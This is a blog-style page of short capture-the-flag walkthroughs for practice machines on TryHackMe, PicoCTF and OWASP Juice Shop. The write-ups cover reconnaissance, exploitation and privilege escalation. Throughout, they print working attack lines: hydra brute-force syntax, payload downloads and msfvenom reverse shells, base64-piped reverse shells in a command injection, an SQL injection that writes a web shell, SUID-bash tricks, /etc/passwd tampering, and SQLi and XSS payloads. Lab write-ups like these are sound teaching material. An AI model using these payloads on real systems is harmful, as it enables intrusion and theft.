Penetration tester, cyber security student, CTF enthusiast. The writeups on this page aren't the most beautiful ones nor the most explicative, but they are supposedly short and to the point. If you need a nudge in the right direction or you want a second look on a machine you completed, these are quick reads for your fast-paced, (hopefully) ethical, hacker life. Merry Hacking!

Zeno - THM

At first, after a basic scan, there is only a 12340 TCP port open and SSH on 22. Connecting to it using netcat reveals this is an Apache 2.4.6 webserver, running on PHP 5.4.16.

Using a directory scanner, we find out there is RMS installed on the webserver.

In our manual scraping of the website, we can notice that, once we create an account, we get a sample message from an account called "administrator", and in the Contact Us section there is an email address that is registered to the domain pathfinderhotel.com, so maybe we could try to brute force login credentials for an administrator@pathfinderhotel.com.

In the meanwhile, checking the software RMS, there is an unauthenticated RCE available, allows to upload a webshell in PHP, so I used that and launched a reverse shell to start enumerating what is on the box.

We can see there is an edward user by checking the /home directory, and we can also see some DB credentials reading the config.php of the RMS web server. Using those credentials we can check the content of the DB running on the local machine. In the member table of the dbrms database we can find some credentials, including a hashed password for an edward zeno user. The hash is MD5, we can crack it and retrieve the password required to escalate our current shell to the edward user.

But this is not our lucky day, as the hash is not easily cracked. We need to run a privilege escalation checker now, hoping for some privesc suggestion.

Linpeas suggests we have write privileges over a service, which might be useful later on, but also suggests that there are passwords in /etc/fstab, which is true for a zeno user. The password, however, seems to work for our edward user as well, so here we get our first flag.

We can now run linpeas once again, and go along with our usual privesc checks. We can run reboot with sudo, we might exploit that writable service linpeas showed us before. If we modify its ".service" file and we include in its ExecStart:

/bin/bash -c 'cp /usr/bin/bash /var/tmp/shell && chmod +s /var/tmp/shell'

we can then reboot the machine as sudo and once it's up again we can login as edward and launch our suid shell to act as root, job finished.

Merry hacking ;)

Skynet - THM - Braindump

There is a web server and samba running, automatically scan both using dirb and enum4linux.

The web page served is a useless search, nothing in the source code either.

There is anonymous listing enabled on the samba server, there are some directories to examine.

Dirb returned a login form exposed on a /squirrelmail directory, there is also a version number: 1.4.23

There is a known RCE for this version, but requires login credentials. Maybe we have a username (milesdyson) but password?

In the meanwhile, we can access two files only on the samba server, a message saying many passwords have been changed, so maybe it is an easy one to bruteforce? and we have some logs as well. Logs 2 and 3 are empty, but the first one seems like a wordlist, maybe we can bruteforce our squirrelmail login for milesdyson.

We bruteforce using

hydra -l milesdyson -P log1.txt http-post-form  '/squirrelmail/src/redirect.php:loginusername=USER&secretkey=PASS&jsautodetectresults=1&justlogged_in=1:Unknown user or password incorrect.'

It works like a charm and we have credentials to login, let's try to use that RCE...actually, before this, let's take a look inside the squirrelmail server, there is the smb password for milesdyson, and there we can find a reference to a hidden directory called 45kra24zxs28v3yd, let's check that out.
Running gobuster against it, there is an administrator login form revealing this is a Cuppa CMS. There is a known exploit that lets us include a remote file, we can include the php-reverse-shell and get a shell as www-data
Looking at the crontab, there is a tar running with shell expansion with root privileges, we just need to add two special files to /var/www/html to get a root shell, just add --checkpoint=1 and --checkpoint-action=exec=<command to run> in the directory.

Info steps:

  • Gathered a username, milesdyson
  • Squirrelmail 1.4.23
  • Bruteforce credentials using log1.txt, retrieved from SMB server
  • Read emails, find secret directory
  • Directory bust sub directories, find vulnerable CMS
  • Exploit with RFI, gain low level shell
  • Exploit tar running with shell expansion as root
  • Merry hacking

Alfred - THM - Braindump

There are two web servers, one on 80 revealing an email address, and one on 8080 that is a Jenkins login page. Jenkins has, notoriously, a poor password policy.

Searching on Google, default is admin. Tried simple combinations, admin:admin worked.

We can modify the configuration for the existing project and insert a build command to run when building it, we can try to launch a reverse shell from it.

We can use this command in the build:

certutil.exe -urlcache -split -f & Advanced.exe

where Advanced.exe is a msfvenom-generated payload to launch the reverse connection to my machine

Then I used this shell to launch a reverse meterpreter, can use the extra help of meterpreter. I load PowerUp to enumerate for possible privesc vectors. Says we already are local admins. I used load incognito and list_tokens -g to see if we could impersonate another user.

We can impersonate BUILTIN\Administrator, impersonate_token "BUILTIN\Administrator" and we are NT Authority System. We still need to migrate to actually have these privileges, first run ps and then migrate to the PID of the services.exe process. We can now read root.txt in the config directory.

Steel Mountain - THM - Braindump

After an initial scan, there are ports that suggest this is a Windows box. There is also a web server on 80, shows an image and nothing more. Nothing found using dirbuster.

There is also another web server, on 8080. Reading the source of the page, this shows a name and a version, Rejetto HFS 2.3. There are some known RCE exploits for this specific version, one in metasploit called exploit/windows/http/rejettohfsexec, let's try this one. 

Seems to work, meterpreter shell opened. We are user bill in a steelmountain domain. We can get the user flag in his desktop. Now we need a privesc vector.

We can use PowerUp loading it with meterpreter, it shows an unquoted service path escalation vector. We could have found this by running 'powershell -c "Get-Service"' as well. We can use msfvenom to create a suitable payload with the following command:

└─# msfvenom -p windows/shellreversetcp lhost= lport=2222 -f exe -o Advanced.exe
We can then upload it in the proper directory and restart the service running (in a Powershell shell):
Restart-Service -name AdvancedSystemCareService9
We are now NT authority system, job done

Road - THM

Road - THM

There is an SSH port open and a web server. With no credentials, the web server is a better option right now.

I started by looking around the website: there is the information about who created the platform right in front of you, but I could not turn that into valuable info with a basic search. I registered an account and logged in. Snoop around the authenticated pages, and you see there is a functionality to upload a profile picture, but it is admin-only. However, this tells us the email for the admin, we can try to brute force and obtain the password now.

While bruteforcing, notice that there is the opportunity to change your current password. Intercept the request and reset the admin's one. There is no authorization check, so we can now login as the admin.

Now we can try to upload a reverse shell as a profile image.

When you upload, analyze the response. It says "Image saved" but gives you no direction as to where it was saved. Either search for "profile" or scroll a little further down in the response and you should catch a reference to a /v2/profileimages directory, you can go there and catch your reverse shell (careful, go straight for your file as directory listing is disabled for this one).

We now have a beautiful shell and we can read the user.txt flag.

Snooping around, the /etc/passwd reveals there are both mysql and mongo on the box.

Tried with mysql first, nothing. Running "mongo", instead, gives us the mongo cli prompt. Enumerating the DB, there is a backup database containing a user table where we can find the credentials for the user "webdeveloper".

With these credentials we can just kill our reverse shell and open an SSH connection to the box.

Our new user has sudo privileges to run a binary as any other user, including root. Running strings on this binary reveals that it runs the following command:

tar -czvf /root/.backup/sky-backup.tar.gz /var/www/html/*
Off to GTFObins we go, to see if we can insert something tasty in /var/www/html and exploit this shell expansion... but seems like we can't exploit this, so back to the drawing board.

Read carefully the output of "sudo -l" and notice that you can change the default behaviour when preloading libraries when processes start. Everything you need to gain a root shell is explained here.
Merry hacking ;)

speeds and feeds - PicoCTF

Once you connect to the given address, you get a very long list of strings that make no sense. I tried to look at them to find some sort of pattern, but nothing caught the eye, so I copied one of the lines and pasted it into the search bar. Google suggests this might be something called G-code. Turns out, it is a programming language for machines and you can find online interpreters to plot the code you have been given, which will show you the flag. The interpreter I used is at https://ncviewer.com/.

The numbers - PicoCTF

Open the file, it contains a long list of numbers. These are very low in value, so it is clearly not ASCII. Actually, these are so low that they might just be references to the letters' positions in the alphabet. Turns out, this is all there is to this challenge. Easy peasy ;)

Glory of the garden - PicoCTF

The file you download contains a string that gives you the flag. It should have been my first attempt, but it was actually my fourth:

  1. opened the picture with eog to look at it, pointless;
  2. used exiftool to inspect metadata, pointless;
  3. used steghide to extract hidden data using a blank password and the passwords "garden" and "glorious", still pointless;
  4. ran strings on the file, success!

Transformation - PicoCTF

Translate the string into unicode and insert it into a variable, then treat the encryption as a mathematical function and try to obtain a reverse formula. Imagine that A and B are the characters that, when mixed as described in the challenge description, generate the first character of the encoded text. 

To retrieve A, just push the encoded character 8 places to the right, so to clean all values that were influenced by the value of B.

To retrieve B, you now have the encoded value and A itself: what you can do is shift A back 8 places to the right and remove its influence from the overall value by subtracting it from the encoded character. What's left? B. Retrieve it and put the flag back together. 

The following code is the realization of the steps described. To retrieve the flag in a comfortable way, pipe the output of this code into this command:

tr -d "\n"

flag= u'\u7069\u636F\u4354\u467B\u3136\u5F62\u6974\u735F\u696E\u7374\u3334\u645F\u6F66\u5F38\u5F65\u3730\u3362\u3438\u367D'
for i in range(0, len(flag)):
        a= chr(ord(flag[i])>>8)
        print(chr((ord(flag[i]) - (ord(a)<<8))))

Petshop Pro

HackerOne CTF - Petshop Pro

Flag 1

When you go to checkout, you submit a URL-encoded body with the post. Insert a new object in there or modify an existing one and insert a negative price to gain a flag.

Flag 2

There is a login form (found through a directory bust). There is a logic error that helps you enumerating user, as a correct username will give you a different error message. Using hydra with rockyou for usernames turns up a valid username fairly quickly. Then you can just use this username and use rockyou for passwords as well, gaining login.

Flag 3

Once you have administrative access, you can edit elements. Edit a specific one in order to obtain a stored XSS in the cart page to obtain a flag.

OWASP Juice Shop

OWASP Juice Shop

This is how I solved some of the challenges listed in the OWASP Juice Shop scoreboard, you can find the one that interests you by searching its name in the table.

Error Handling (Provoke an error that is neither very gracefully nor consistently handled.)
Try a URL of your choice to see if anything funny happens, some error handling practices could give you great results in terms of finding vulnerabilities. In this case, it reveals the framework AND it solves the challenge.
Score Board (Find the carefully hidden 'Score Board' page.)
Read the JS included in every page, there is a mention to a score-board. Try this as a URL and you are done!
Bonus Payload (...)Paste the payload given in the search bar and trigger this fun experience
DOM XSS (Perform a DOM XSS attack with <iframe src="javascript:alert(xss)">.)
Paste the payload in the search bar and the job is done. XSS in the search bar is easy :)
Zero Stars (Give a devastating zero-star feedback to the store.)
Intercept the request and modify the Rating value to zero. Using Burp this is easy, barely an inconvenience.
Payback Time (Place an order that makes you rich.)
Modify the request that adds to the basket and ask for a negative quantity of an item. Complete the checkout and enjoy your new free money
Privacy Policy (Read our privacy policy.)
Register an account and log in. In the new menu you can find the privacy policy.
Login Admin (Log in with the administrator's user account.)
Login using the mail ' OR 1=1 -- - and anything you want in the password, as it will be commented out and doesn't matter
Password Strength (Log in with the administrator's user credentials
without previously changing them or applying SQL Injection.)
The token you receive when logging in is a JWT token. Analyze it (using, for example, jwt.io) and retrieve the password's hash. Luckily, the password isn't all that strong, so you can easily crack it online and access without the need for SQLi.
Admin Section 
You have admin credentials, but nothing seems different. There must be some secret section. Brute forced it, honestly, tried "administrator", "admin" and "administration". Lucky, I guess
Five-Star Feedback (Get rid of all 5-star customer feedback.)
In the administration section, delete the 5 star review.
Bully Chatbot (Receive a coupon code from the support chatbot.)
Bomb the chatbot asking for a coupon using the repeater, after some attempts it will give up and assign you a 10% discount code: pEw8pf!Cal
Login MC SafeSearch (Log in with MC SafeSearch's original user credentials without applying SQL Injection or any other bypass.)
There is a video from this rapper sharing his login information. Just remember the password is the one he says at the start of the video, not the changed one you see on his screen
Confidential Document (Access a confidential document.)
There is a link in the terms of use that lets you download a file. The file is pointless, but the path is extremely interesting. Open the directory where you got that from and there is plenty of interesting informations in there.
Deprecated Interface (Use a deprecated B2B interface that was not properly shut down.)
The file upload functionality in the Complaint section allows to upload PDF and ZIP, or so it seems. The Javascript file responsible for this also lists XML as supported, so in the File Name section of the upload type *.xml and select an XML file. Upload it, add a complain message and you're done!
Exposed Metrics (Find the endpoint that serves usage data to be scraped by a popular monitoring system.)
The name of the monitoring system is given to you, so Google it and you can find a list of possible endpoints. It's a really basic guess, as well
Outdated Allowlist (Let us redirect you to one of our crypto currency addresses which are not promoted any longer.)
In one of the files included in all pages there is a reference to an old redirect that will get you to a bitcoin address, which solves this challenge
Repetitive Registration (Follow the DRY principle while registering a user.)
The check on whether you entered the same password is front-end only. Intercept, insert two different passwords just for the sake of it and move on to the next challenge
Missing Encoding (Retrieve the photo of Bjoern's cat in "melee combat-mode".)
In the Photo Wall section there is one image missing. If you look at the URL you will notice the hashtags in the name aren't encoded, which causes problems as hashtags have a special meaning when inside a URL. Escape them with their URL encoded version "%23"
Meta Geo Stalking (Determine the answer to John's security question by
looking at an upload of him to the Photo Wall and use it to reset his
password via the Forgot Password mechanism.)
John posted a picture on the photo wall that depicts is favourite hiking spot. Download the image and analyze it, there are still coordinates in it. Now this is tricky, jot down a few possible answers because it is not super easy to find the correct one. Once you get it, you can reset his password.
Weird Crypto (Inform the shop about an algorithm or library it should definitely not use the way it does.)
Looking at passwords, like the one I cracked earlier, it's clear the shop uses md5 as their password hashing algorithm. Let them know in the feedback section by submitting a feedback that says "md5" and this challenge is done
View Basket (View another user's shopping basket.)
When you ask for your basket, check the request. There is a clear parameter you can tamper with in the URL, this will give you access to other users' baskets.
Visual Geo Stalking (Determine the answer to Emma's security question by
looking at an upload of her to the Photo Wall and use it to reset her
password via the Forgot Password mechanism.)
As with John's challenge, she updated a picture to the photo wall. This time look more carefully, there is something written on the first window left, second floor. Zoom in hard enough and you will get the name of the company, which is also the answer to her security question.
Security Policy (Behave like any "white-hat" should before getting into the action.)
As defined in the relative RFC, the security.txt is under the ".well-known" directory
Reflected XSS (Perform a reflected XSS attack with <iframe src="javascript:alert(xss)">.)
The id parameter you see in the URL of the Track Order page (the small delivery truck) is reflected in the page, quite clear to see. Insert the payload for the reflected XSS and it's done
Admin Registration (Register as a user with administrator privileges.)
During the registration process, modify the request adding the field "role" with value "admin".
Login Bender (Log in with Bender's user account.)
We know the login form suffers from SQLi, so you only need a very basic bender@juice-sh.op' -- - in the username field
Login Jim (Log in with Jim's user account.)
Same as right above, except with Jim's email.
CAPTCHA Bypass (Submit 10 or more customer feedbacks within 10 seconds.)
Intercept the request and quickly repeat it multiple times to pass this challenge.
CSRF (Change the name of a user by performing Cross-Site Request Forgery from another origin.)
Use the given website to create an HTML form with a single input field, called username and with the value of CSRF. Submit this to the correct /profile endpoint. Try opening this page you just created to perform a CSRF attack against the user you are logged in as (in a different tab).
Product Tampering (Change the href of the link within the OWASP SSL
Advanced Forensic Tool (O-Saft) product description into
Submit a PUT request that modifies the description field as requested by the challenge. To identify the product you can watch the requests and find out that its product ID is 9.
Bjoern's Favorite Pet (Reset the password of Bjoern's OWASP account via
the Forgot Password mechanism with the original answer to his security
Look up Bjorn Kimminich, he posts about his cat quite a bit. Sometimes he slips the name in its post, oops. Use it to reset the password.
Forged Review (Post a product review as another user or edit any user's existing review.)
Intercept the request that creates a review, modify the username associated with it and set it to another user's. 
Reset Jim's Password (Reset Jim's password via the Forgot Password mechanism with the original answer to his security question.)
Everything ever done by Jim on the platform is a reference to the person of Captain Kirk, who appears to have a brother whose middle name is Samuel. This is the answer to the security question, use it to reset his password.
Upload Size (Upload a file larger than 100 kB.)
Upload to /file-upload using a tool like Burp or Postman with a parameter named file
Upload Type (Upload a file that has no .pdf or .zip extension.)
The restriction is strictly front-end, no problem if you try from a tool like Burp or Postman. Easy bypass
Manipulate Basket (Put an additional product into another user's shopping basket.)
An example of HTTP parameter pollution, the application behavior is not well defined if you write "BaskedId" twice in the request to add a product to your shopping cart. The first one passes the check as you set it to your basket's value, the second one you add gets the item added to its cart as well.
GDPR Data Erasure (Log in with Chris' erased user account.)
Could not find any reference to chris's email, but the fact that he has an erased account gives us the opportunity to try this injection in the login form: ' or deletedAt IS NOT NULL -- -
Fortunately enough he is the first user returning from this query, so we pass the challenge
Login Amy (Log in with Amy's original user credentials. (This could take
93.83 billion trillion trillion centuries to brute force, but luckily
she did not read the "One Important Final Note"))
Search the very specific sentence about cracking time on Google. This takes you on a brute-force key-space calculator. At the end there is a section explaining how password padding is not a good idea. Except that Amy does not know this and used her husband's name (leet the i) with a few trailing dots.
Privacy Policy Inspection (Prove that you actually read our privacy policy.)
Inside the privacy policy some words will trigger a visual effect similar to a fire in the back. Combine these words in a URL and get to it, unlocking this challenge. Compose the url using each word as a directory, just/like/this
Forged Feedback (Post some feedback in another users name.)
Change the user ID in the request to the one of a different user and you are done
Deluxe Fraud (Obtain a Deluxe Membership without paying for it.)
The button to pay with your wallet is disabled. Remove the disabled from the page source and click it. Watch the request, it contains a JSON key-value parameter. Edit the value so that it is an empty string and the shop gives you a free membership.
API-only XSS (Perform a persisted XSS attack with <iframe
src="javascript:alert(xss)"> without using the frontend application
at all.)

Post a product using a POST to /api/Products. Three fields required in the JSON: name, description and price. Name is well escaped, but I am afraid the same cannot be said for the description field, which triggers your lovely XSS

Client-side XSS Protection (Perform a persisted XSS attack with
<iframe src="javascript:alert(xss)"> bypassing a client-side
security mechanism.)
Catch the request generated when a user creates an account. There is a client side filter for the email, but if you replay it with Burp or create one with Postman you can put the specified payload in the email and you are ready to move on to the next challenge. Side note: the XSS is triggered in the administration page
XXE Data Access (Retrieve the content of C:\Windows\system.ini or /etc/passwd from the server.)
Create an XML file containing an external entity definition that requests either one of these two files. Remember, you can upload XML files in the complaint section, as we did in a previous challenge.
Christmas Special (Order the Christmas special offer of 2014.)
Check the search bar, it is susceptible to SQL injection. Judging from the error messages, you can build a correct payload in the form '))--
Looking at the list of products retrieved, you can identify the Christmas special. Intercept the request performed whenever you add a product to the basket and modify it, asking to add the Christmas special (using its unique ID). Perform the checkout to pass the challenge.
Database Schema (Exfiltrate the entire DB schema definition via SQL Injection.)
We know from the previous challenge that we have SQLi on the q parameter in the search function. With a UNION select, we can try to identify how many columns we need to return (blabla')) UNION SELECT 1,2,3,4,5,6,7,8,9 from sqlitemaster works)
We just need to retrieve the "sql" column from sqlite
master, so just substitute one of the numbers with the "sql" column.
Login Support Team (Log in with the support team's original user credentials without applying SQL Injection or any other bypass.)

Searching the main JS file reveals the following message:"@echipa de suport: Secretul nostru comun este \xeenc\u0103 Caoimhe cu parola de master gol!"
If you are a foreign language pro, you will recognize this as Romanian, the Unicode itself translates to another Romanian word, încă.

Search the name, it suggests it's Irish. There is a redhead in the about us section (stereotypes?). You can use her image as key to open the kdbx file and obtain the password to login as the support.

Access Log (Gain access to any access log file of the server.)
A directory bust should easily lead you to /support/logs. Download the file that is there to pass the challenge.
CSP Bypass (Bypass the Content Security Policy and perform an XSS attack with <script>alert(xss)</script> on a legacy page within the application.)
The "link an image" function in the profile page allows you to overwrite the CSP when you link a non existing URL. Modify the CSP so that it allows unsafe script execution from inline scripts and insert a payload for XSS in the username field. Careful though, there is a filter. Not the smartest of filters, can be bypassed with <<w|wscript>alert('XSS')</script>.
Leaked Unsafe Product (Identify an unsafe product that was removed from the shop and inform the shop which ingredients are dangerous.)
An OSINT challenge. Everything starts from the SQLi that revealed all the products, including the removed ones. Search the list of ingredients you see for the dangerous item, and you should find a page where a user suggests some exotic fruits made their way into this product. There is a link to a page with the full list of ingredients. You need to send to the support the two ones that seem to be fatal when combined.
Easter Egg (Find the hidden easter egg.)
In the ftp section there is a file named eastere.gg
You can only download md and pdf files, but performing Null Byte Poisoning you are able to bypass this check. Simply request eastere.gg%2500.md, for example
Poison Null Byte (Bypass a security control with a Poison Null Byte to access a file not meant for your eyes.)
The explanation above shows how to perform a null byte poisoning attack, you will kill two birds with one stone(?).
Nested Easter Egg (Apply some advanced cryptanalysis to find the real easter egg.)
Take the content of the easter egg, it's clearly in some form of base. Very easily, base64. Once decoded, looks like a URL, but it just doesn't work. Try rotating it using a ROT13 mutation and you will get /the/devs/are/so/funny/they/hid/an/easter/egg/within/the/easter/egg, which seems just about right.
Expired Coupon (Successfully redeem an expired campaign coupon code.)
Inside the main JS file, search for "campaign". You will see there is a list of valid coupon codes, and also a validation procedure that checks if the coupon is still valid. Pick one, translate the JS timestamp and set your system time so that the coupon would still be valid (remember to turn ntp off with set ntp-off, then run date -s "<the date you need"). Complete the checkout and you are done
Forgotten Developer Backup (Access a developer's forgotten backup file.)
There is a bak file in the ftp directory, use the null byte poisoning technique to retrieve it and complete the challenge.
Forgotten Sales Backup (Access a salesman's forgotten backup file.)
Same technique as right above, just do it on the right file (coupons_...)
Login Bjoern (Log in with Bjoern's Gmail account without previously changing his password, applying SQL Injection, or hacking his Google account.)
Bjoern used oAuth. Check for the word "oauth" in the main JS, you will find that the application, needing to set a password, simply takes the mail, reverses it and encodes it into base64. Simply follow these steps to get the password you need.
GDPR Data Theft (Steal someone else's personal data without using Injection.)
Check the track order request and notice that the user information has all vowels removed. Create two users that, once all vowels are removed, collide resulting in the same username. Now export your data in the privacy section and steal all the tracing of the other users' orders.
Misplaced Signature File (Access a misplaced SIEM signature file.)
Read the appropriate file in the ftp directory using the same trick as before, the null byte poisoning technique (the file is "suspicious...")
NoSQL DoS (Let the server sleep for some time. (It has done more than enough hard work for you))
The server shows you products' reviews. Analyze the get request that generates this, and substitute the product ID with a sleep(2000) request.
NoSQL Manipulation (Update multiple product reviews at the same time.)
Notice the PATCH request when reviewing products. Modify the request so that the body is as follows:
{"id":{"$ne":-1},"message":"NoSQL Injection!"}
Allowlist Bypass (Enforce a redirect to a page you are not supposed to redirect to.)
There is a redirect when you click on the Github section in the navigation pane on the left. The allow list seems to work only if there is the Github part of the URL present in the redirect, so you can use a payload like: /redirect?to=http://x.com?url=https://github.com/bkimminich/juice-shop 

Empline - THM

Empline - THM

After the initial scan there are three open ports. Two are clearly no-goes unless you feel like bruteforcing (which I would not suggest, unwise at least). Look up the web page, most links seem pointless but one gives away both a domain and, more importantly, a subdomain. Save both of them in your /etc/hosts and go take a look. The initial front page could not give you clearer instructions on what to do next. There is a software name and a version: Google this combination of informations.

Turns out, there is a pretty sweet unauthenticated XXE available, and more than a few blog posts detailing the steps to create the appropriate resume to exploit this. Now, we can read /etc/passwd, gain some usernames and go for brute forcing one of the other two services, OR we can read config.php and take away the credentials to connect to the database server. The choice is yours.

Once you CLEARLY decide to pick the credentials from config.php, the maneuver is pretty straightforward. Connect to the DB, open the users table and get those hashes. Crack them (crackstation is a strong suggestion in this case, if you don't want to sit and wait for I honestly don't know how long). You now have valid credentials to start a SSH connection.

Get your first flag, and start looking around.

Now the privesc vector is...not the most common, not the most UNcommon. If you have in your routine to look for capabilities, well done. If you do not, maybe linpeas did the job for you.

Turns out, ruby has the chown capability set, meaning it can change ownership of files, like this:

ruby -e 'require "fileutils"; FileUtils.chown(1002, 1002, "/etc/passwd")'

From this point on, the possible ways you could go are endless. My choice was to modify /etc/passwd adding this line


This creates a user, named root2, with the password "mrcake", which has the same privileges as the original root (look at its UID, there's the trick).

After this step is done, simply su root2 and get your well deserved root flag. Your job is done, move forward.

And, as always, merry hacking ;)

Superspam - THM

Super-Spam - THM

The ports after the initial scan, apart from the usual service on port 80, are fairly uncommon, like FTP on 4019 and SSH on 4012. The first I tried (more because this is a CTF than anything else) is to anonymously login to FTP, which gave us access to quite a few files. From the note, we could assume adam and super-spam are usernames. We also learn that the capture file is a reminder of how the alien got in, so we download that for further analysis and give it to Wireshark. While we study it, we could also run a bruteforce against FTP and SSH, just in case.

Midway through the packet capture you will start noticing a lot of deauthentication packets, so this might be a deauth attack. If this is how the alien gained access, maybe he was successful in capturing a handshake and later cracking the gathered hash, so we'll try to do the same. Using aircrack-ng we can try to crack the hash, but I preferred to use it only to generate the hash in a hashcat-friendly format (-j flag) so that I could try cracking it in hashcat.

It won't take long before hashcat cracks it, and there we have a password. But what can we use it for?

Let's take a look at port 80. Looking at post authors we can add the following usernames to our list:


We now use this list against the login page of the web server trying with the password we found earlier (password reuse is a life saver while pentesting), successfully authenticating into the CMS.  

Googling the CMS version we find an interesting article that says

The experts pointed out that the flaw could have been exploited to add PHP extension in the list of allowed extensions and then upload the file.

Which is exactly what we'll do. A disclosure on HackerOne gives you full details on how to perform this attack, and in no time you have a reverse shell as www-data. Looking at /etc/passwd we find out that not all of our usernames were good, as a matter of fact the only valid ones were:


There is also an interesting mysql user, is there a db somewhere? Looking at listening services there is a local listening DB on 3306. Lost a bit of time on that to no use, that is not where you should be looking at.

Besides that, we can read both the first flag and a note snooping around in user homes. The users' homes are in a huge mess so you will probably need to search them little by little to make sure you don't miss anything, it's a good training of thorough enumeration. Don't miss the python script among the many images and be sure to read the note. Move what you need to the attacking machine (the note should tell you which files are useful and which aren't) and retrieve the hidden credential.

With this new password you can login as one of the other users on the machine. Look in his home and you'll notice a "passwd" file. You can use this to login to the VNC server, which runs as root. Retrieve the flag, decode it and you are done.

As always, merry hacking! ;)

Year of the Fox - THM

Year of the Fox - THM

There are three open ports, including samba and a web server. Access to the server is limited by HTTP Basic Authentication, and brute forcing it right now is not a viable option. We first try to enumerate domains, shares and users through enum4linux. Fortunately enough, the box allows to log in using null sessions, so enum4linux is capable of giving us some juicy info, including two usernames.

We can try to brute force our access using these usernames either into samba or past HTTP Basic Authentication. I personally tried both but more threads can be spawned against HTTP and the brute force came to a successful login in reasonable time.

On the web server there is a search page that seems to browse the content of a directory on the box. Possibly, it is passing our input to a command on the box. There is some client side filter, easily avoid it using Burp to modify your requests. A working payload is structured as follows:

\"; <command>; echo \"

where my choice for <command> was:

<Python reverse shell base64 encoded> | base64 -d | bash

This way we obtain a shell on the box as the low privileged user www-data.

With some basic enumeration you should quickly notice that port 22 is open locally, meaning there is an SSH server that we couldn't access through our first scan of the box. Set up a port forward, my choice to do this was using socat and opening a new port on the target (not very stealthy, but quick and easy enough):

./socat tcp-l:33060,fork,reuseaddr tcp: &

Now you can try to brute force your way in using the two usernames (three, including root) that we know exist on the box. Hint: if you check the sshd_config you will notice only one user is allowed to access, so you can significantly reduce the number of attempts required to brute force access.

This brute force will, eventually, come to a successful login. You can now retrieve the first flag. Moving on, you should notice you now have sudo privileges: you can run a single binary as root, but at first sight it doesn't seem to be extremely useful. Move it to your attacking machine and analyze it with radare2, you should notice the "poweroff" function is called without specifying the full path. Go back and check sudo privileges: sudo is not using secure path! This means you can modify the existing PATH, create a "poweroff" binary that is just a copy of /bin/bash and execute the binary with sudo privileges. This will cause your custom function to get executed as root and you will get your well deserved root shell. Nice job!

As always, merry hacking!

Year of the dog - THM

Year of the Dog - THM

The scan doesn't give you much to choose from, two open ports and no reasonable way of interacting with SSH, so let's start from HTTP.

The web server seems to be a waiting queue, what for is unknown. How does the page determine your position in queue every time you reload the page? Cookies, indeed. The cookie is not immediately clear to decode, but you can easily spot some SQL injection possibility by adding a single quote at the end of it. Besides enumerating the DB, there is a serious misconfiguration allowing you to write a file on the web server. The injection looks like this:

<cookie>' UNION SELECT 1,<hexcode> INTO OUTFILE '/var/www/html/shell.php'-- -

where <hexcode> is the hex of the classic PHP web shell that receives a "cmd" GET parameter. It can be anything you want of course, just stating clearly what I put there. Now that you have some basic RCE, let's make it a little more bearable. I retrieved the full php-reverse-shell using wget and activated it by browsing to its location, thus gaining a remote shell.

The shell belongs to user www-data. Nonetheless, you can still access user dylan's home. There is an interesting file that is readable, it seems to be a log containing SSH accesses. Check it thoroughly as dylan seems to have put his password where his username should go, meaning you can now SSH into the box as dylan.

Retrieve the first flag and examine the box. There is a service running on port 3000, port forward using SSH. There is a Gitea server running, but logging in as dylan requires a 2fA step we cannot bypass right now. Look for the folder where this server keeps its data and you will find its DB as well. Check it out (either copy it to your machine or use python's sqlite3 module to interact with it): you can completely disable 2fA by deleting the relative table, thus gaining access as dylan.

Now you can modify dylan's repo git hooks. Just add a bash reverse shell line at the end of the pre-receive hook, then make a modification to one of the files and commit, causing its execution and, thus, gaining a reverse shell as user git.

Now git runs in a different environment, but the /data/gitea directory seems to be shared among environments. As you can run commands as root of this environment (sudo -l to notice this is indeed the case) just copy a suid version of /bin/bash here and run it in dylan's environment, gaining root access to the box. Get your second flag, your job here is done. 

Merry hacking!


CMSpit - THM

After the initial scan, there are two open ports. Brute forcing the first would be unreasonable without having even tried looking at the other one, so let's start from the web server. On the login page, right up front, notice the shiny name of this CMS. With the power of this knowledge, start asking Google and sooner rather than later you should encounter this. Follow what it says like you never followed any other instruction and in no time you should be able to change the admin's password, meaning you can now log into the administrative console.

Keep on reading, the amazing article also tells you that file upload isn't guarded against malicious file, so you can just upload a PHP reverse shell and there you go, you have a shell on the target.

Following the room's instructions, check the open ports (netstat does wonders, nothing too fancy needed). The open port you couldn't see before, what is it? Google again, and it is a MongoDB instance running on the compromised server. Use mongocli to interact with it and you can retrieve both a flag and a password.

Using this password, escalate horizontally to the only real user on the machine. You can quickly notice there is a binary that can be run as root without needing any other permission. This binary suffers from an RCE vulnerability (a quite recent one), and a PoC is available here to more easily aid you in your payload creation. Either start a reverse shell, read shadow and crack passwords or just read root's flag, either way the machine is done and you can move on to your next target. Merry hacking!